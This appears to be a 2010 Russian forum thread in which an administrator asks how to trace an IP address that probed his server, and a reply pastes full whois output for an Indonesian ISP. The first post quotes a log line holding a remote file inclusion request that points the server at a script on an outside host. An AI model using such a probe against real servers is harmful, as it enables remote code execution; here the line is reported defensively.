Где брать акутальную информацию об IP-адресе

Настройка сетевых служб, маршрутизации, фаерволлов. Проблемы с сетевым оборудованием.
Правила форума
Убедительная просьба юзать теги [code] при оформлении листингов.
Сообщения не оформленные должным образом имеют все шансы быть незамеченными.
dimti
проходил мимо
Сообщения: 6
Зарегистрирован: 2010-02-17 16:29:07

Где брать акутальную информацию об IP-адресе

Непрочитанное сообщение dimti » 2010-02-17 16:43:56

Ситуация следующая.
В логах доступа было замечено подозрительное обращение к серверу, вот она запись:
125.167.126.7 - - [17/Feb/2010:12:51:23 +0300] "GET //?_SERVER[DOCUMENT_ROOT]=http://alphabot.fileave.com/Injecktor.txt?? HTTP/1.0" 200 631 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.1.1) Gecko/20090715 YFF35 Firefox/3.5.1"
Это вызвало ошибку на сервере, которая была зарегистрирована:
[Wed Feb 17 12:51:23 2010] [error] PHP Fatal error: Call to undefined function posix_getuid() in http://alphabot.fileave.com/Injecktor.t ... ng.lib.php on line 13
Без понятия, кто и что хотел от нашей системы, скорее всего искали дыры, для того чтобы использовать наш сайт в качестве прокси-сервера.

Предполагаемые действия, для начала заблокировать сеть, связанную с ip-адресом 125.167.126.7

Вопрос: Где можно узнать, кто отвечает за этот ip-адрес. Какому провайдеру он принадлежит. Какой диапозон ip-адресов выделяется для этого провайдера. Как связаться с администраторами, отвечающими за данную подсеть.

В гугле нашлось несколько ссылок на сервисы, предоставляющие whois-данные о домене.
Вот парочку из них (каждый даёт разные результаты по 125.167.126.7)
http://www.whoisinform.ru
говорит, что этот адрес принадлежит некому:
OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
NetRange: 125.0.0.0 - 125.255.255.255
http://2ip.ru/whois/
Отвечает совсем по-другому:
organisation: ORG-IANA1-RIPE
org-name: Internet Assigned Numbers Authority
org-type: IANA
inetnum: 0.0.0.0 - 255.255.255.255
Что это ещё за игра в нолики-двоечки-пятёрочки и точки


Что всё это значит и где найти ответы на интересующие вопросы?
- Где можно узнать, кто отвечает за этот ip-адрес.
- Какому провайдеру он принадлежит.
- Какой диапозон ip-адресов выделяется для этого провайдера.
- Как связаться с администраторами, отвечающими за данную подсеть.

Хостинговая компания Host-Food.ru
Хостинг HostFood.ru
 

Услуги хостинговой компании Host-Food.ru

Хостинг HostFood.ru

Тарифы на хостинг в России, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/

Аватара пользователя
hizel
дядя поня
Сообщения: 9031
Зарегистрирован: 2007-06-29 10:05:02
Откуда: Выборг

Re: Где брать акутальную информацию об IP-адресе

Непрочитанное сообщение hizel » 2010-02-17 16:50:50

Код: Выделить всё

se@test1 ~ >whois 125.167.126.7

OrgName:    Asia Pacific Network Information Centre
OrgID:      APNIC
Address:    PO Box 2131
City:       Milton
StateProv:  QLD
PostalCode: 4064
Country:    AU
ReferralServer: whois://whois.apnic.net

NetRange:   125.0.0.0 - 125.255.255.255
CIDR:       125.0.0.0/8
NetName:    APNIC-125
NetHandle:  NET-125-0-0-0-1
Parent:
NetType:    Allocated to APNIC
NameServer: NS1.APNIC.NET
NameServer: NS3.APNIC.NET
NameServer: NS4.APNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS2.LACNIC.NET
NameServer: NS-SEC.RIPE.NET
Comment:    This IP address range is not registered in the ARIN database.
Comment:    For details, refer to the APNIC Whois Database via
Comment:    WHOIS.APNIC.NET or http://wq.apnic.net/apnic-bin/whois.pl
Comment:    ** IMPORTANT NOTE: APNIC is the Regional Internet Registry
Comment:    for the Asia Pacific region. APNIC does not operate networks
Comment:    using this IP address range and is not able to investigate
Comment:    spam or abuse reports relating to these addresses. For more
Comment:    help, refer to http://www.apnic.net/apnic-info/whois_search2/abuse-and-spamming
RegDate:    2005-01-27
Updated:    2009-10-08

OrgTechHandle: AWC12-ARIN
OrgTechName:   APNIC Whois Contact
OrgTechPhone:  +61 7 3858 3188
OrgTechEmail:  search-apnic-not-arin@apnic.net

# ARIN WHOIS database, last updated 2010-02-16 20:00
# Enter ? for additional hints on searching ARIN's WHOIS database.
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at https://www.arin.net/whois_tou.html
% [whois.apnic.net node-1]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

inetnum:      125.166.0.0 - 125.167.255.255
netname:      TELKOMNET
descr:        PT Telekomunikasi Indonesia
descr:        Menara Multimedia Lt. 7
descr:        Jl. Kebon Sirih No. 12
descr:        JAKARTA - 10340
country:      ID
admin-c:      AN163-AP
tech-c:       IS49-AP
remarks:      For SPAM or ABUSE case, send to abuse@telkom.net.id
remarks:      -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks:      This object can only be updated by APNIC hostmasters.
remarks:      To update this object, please contact APNIC
remarks:      hostmasters and include your organisation's account
remarks:      name in the subject line.
remarks:      -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
mnt-by:       APNIC-HM
mnt-lower:    MAINT-TELKOMNET
status:       ALLOCATED PORTABLE
changed:      hm-changed@apnic.net 20070824
source:       APNIC

route:        125.167.112.0/20
descr:        PT. TELKOM INDONESIA
descr:        Menara Multimedia Lt. 7
descr:        Jl. Kebonsirih No.12
descr:        JAKARTA
country:      ID
origin:       AS7713
mnt-by:       MAINT-TELKOMNET
changed:      hostmaster@telkom.net.id 20090319
source:       APNIC

route:        125.167.96.0/19
descr:        PT. TELKOM INDONESIA
descr:        Menara Multimedia Lt. 7
descr:        Jl. Kebonsirih No.12
descr:        JAKARTA
country:      ID
origin:       AS7713
mnt-by:       MAINT-TELKOMNET
changed:      hostmaster@telkom.net.id 20080312
source:       APNIC

person:       Adriansjah Nasution
nic-hdl:      AN163-AP
e-mail:       adriansjah@telkom.co.id
address:      PT. TELKOM INDONESIA
address:      Menara Multimedia Lt. 7
address:      Jl. Kebonsirih No.12
address:      JAKARTA
phone:        +62-21-3860500
fax-no:       +62-21-3861215
country:      ID
changed:      yogo@telkom.co.id 20050802
mnt-by:       MAINT-TELKOMNET
source:       APNIC

person:       Iskandar Satyogo Prasetyo
nic-hdl:      IS49-AP
e-mail:       yogo@telkom.co.id
address:      PT. TELEKOMUNIKASI INDONESIA
address:      MULTIMEDIA DIVISION
address:      Jl. Kebonsirih No.12 7th floor
address:      Jakarta Indonesia
phone:        +62-21-3860500
fax-no:       +62-21-3861215
country:      ID
changed:      m_untung@telkom.co.id 20040729
mnt-by:       MAINT-TELKOMNET
source:       APNIC

route:          125.167.124.0/22
descr:          PACNET (proxy-registered route object)
origin:         AS17974
remarks:        This route object is for a PACNET customer route which is
                       being exported under this origin AS.
                       +
                       This route object was created because no existing route
                       object with the same origin was found, and since some
                       ANC peers filter based on these objects this route
                       may be rejected if this object is not created.
                       +
                       Please contact abuse@pacnet.net if you have any
                Concerns regarding Spam/Abuses related to this object
                       +
                       Please contact ip-noc@pacnet.net if you have any other
                       Questions regarding this object.
notify:         ip-noc@pacnet.net
mnt-by:         MAINT-AS10026
changed:        ip-noc@pacnet.net 20100204
source:         RADB


В дурацкие игры он не играет. Он просто жуткий, чу-чу, паровозик, и зовут его Блейн. Блейн --- это Боль.

dimti
проходил мимо
Сообщения: 6
Зарегистрирован: 2010-02-17 16:29:07

Re: Где брать акутальную информацию об IP-адресе

Непрочитанное сообщение dimti » 2010-02-17 17:18:45

Такую огромную кобылу у себя перед глазами не заметить.. ничего себе как всё на самом деле. Спасибо.